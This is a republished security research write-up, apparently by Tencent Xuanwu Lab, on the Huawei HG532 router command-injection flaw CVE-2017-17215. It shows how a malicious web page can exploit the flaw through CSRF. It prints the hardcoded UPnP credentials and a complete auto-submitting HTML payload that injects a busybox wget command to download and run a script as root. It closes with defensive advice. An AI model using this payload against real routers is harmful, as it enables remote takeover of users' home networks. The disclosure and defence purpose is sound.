Hacking Book | Free Online Hacking Learning


new exploration of huawei hg532 remote command execution vulnerability -- tencent security xuanwu laboratory

Posted by harmelink at 2020-02-27

On November 27, 2017, check point reported a remote command execution vulnerability in a Huawei hg532 Series Router with the vulnerability number cve-2017-17215. Using this vulnerability, a specially constructed HTTP request packet is sent to the 37215 port monitored by the UPnP service of the router to trigger the command execution. This port is not accessible from the Internet by default, but there are still many devices that can access this port on the Internet because of the huge number of routers in this series. At present, worms are using these ports exposed on the Internet to spread [1].

Recently, there have been a lot of analysis on the principle of this vulnerability at home and abroad [2], which will not be repeated here. However, we find that the actual threat of the vulnerability may be more serious than what we think at present, and some defense suggestions for the vulnerability are not enough or even wrong. The hg532 series devices with 37215 port exposed on the Internet only account for a small part of them, which is enough to be used by worms. What if other 37215 ports accessible only on the Intranet can also be used by attackers?

In 2013, a domestic router DNS hijacking event broke out, using the CSRF attack technology in web security. Can this attack technology exploit this vulnerability of hg532 router? If it can, then as long as the user of hg532 router is induced to visit a malicious page with his mobile phone or computer, the router can be completely controlled by the attacker. We start with the POC of the vulnerability. In POC, to successfully exploit the vulnerability, it is necessary to construct a post request package in XML format, and it needs to pass HTTP basic authentication on the server side. There is no prediction part in payload. Therefore, the CSRF attack test of this request only needs to complete two points. One is to successfully pass the HTTP basic authentication on the server side, and the other is to construct XML attack code.

First, let's look at the part of HTTP basic authentication. If the HTTP basic authentication fails, the server will return a 401 error, unable to reach the logic in question. At present, POC in the network mostly constructs a field suitable for basic authentication in the HTTP request header.

Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

In modern browsers, if you want to add custom items to the HTTP request header, you can only send the request through XMLHttpRequest, and at the same time, you need the server to return the list that allows adding the header content. The UPnP service does not allow XMLHttpRequest to add this item to the request header. To circumvent this limitation, we can use DNS rebind technology. But do we really need such a complex attack?

Looking at the fields of HTTP basic authentication, we can see that the user name and password used for basic authentication are DSLF config: admin. Therefore, we only need to construct the form and make it post to http: / / DSLF config: admin @ routerip: 37215 to automatically complete the basic authentication.

dslf-config:admin http:// dslf-config:admin @routerip:37215

The next step is how to construct an XML request package with a table list. In order to prevent the browser from encoding the request body, we need to specify the enctype of the form as text / plain. We can use the value of the name and value attributes of the input tag to construct the content we want. An example of CSRF attack payload constructed finally is as follows.

text/plain <body onload='document.forms[0].submit()'> <form method='POST' enctype='text/plain' action="http://dslf-config:[email protected]:37215/ctrlt/DeviceUpgrade_1"> <input name='<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>a' value='1;$(/bin/busybox wget -g -l /tmp/.f -r /b);</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>'> </form> </body>

As long as the attacker entices the user to visit the page containing the above code, the vulnerable router will download a bash script remotely and execute it as root.

Therefore, in fact, almost all Huawei hg532 series routers with vulnerabilities are at risk of being remotely attacked, not just those with 37215 port exposed on the Internet. A text message with a malicious link can let your router be controlled by an attacker. Once the router is controlled, it may lead to the fall of other devices in the intranet.

At the same time, according to our actual test, even if the user shuts down the UPnP service, the vulnerable router can still be attacked after restarting. And modifying the router management password does not affect the password used for basic authentication of UPnP service. Therefore, it is not feasible to try to shut down UPnP service and modify router management password to prevent the vulnerability. In addition, even if the built-in firewall level of hg532 is set to high, it is unable to defend against this kind of attack. The most effective defense is to install the new firmware. The latest firmware currently available on the hg532e product page [4] is the November 7, 2016 version [4]. Although the official security notice does not state that the firmware is no longer affected by cve-2017-17215, according to our analysis and test, at least the known cve-2017-17215 vulnerability attack mode is invalid for this version of firmware.

In addition, if you change the IP address on the LAN side of the router to a non default address, as shown in the figure below, to, you can also cause some interference to the attack. However, it is still possible for an attacker to obtain the real IP address of the LAN side of the router in many other ways. Finally, thank TK for his attack ideas, and thank huimingliu and HyperChem for their great help in obtaining router shell.

Demo video:

Reference [1] Tencent honeypot system captures high-risk IOT worm okiru http://slab.qq.com/news/tech/1705.html [2] Huawei hg532 Series Router remote command execution vulnerability analysis https://paper.seebug.org/490/ [3] statement on remote code execution security vulnerability of hg532 product http://www.huawei.com/cn/psirt/security-notices/huawei-sn-20171130-01-hg532-cn [4] Hg532e product page http://m.huawei.com/cnxmobile/consumer-ncbdtest/home-internet/broadband-devices/detail/hg532e-cn.htm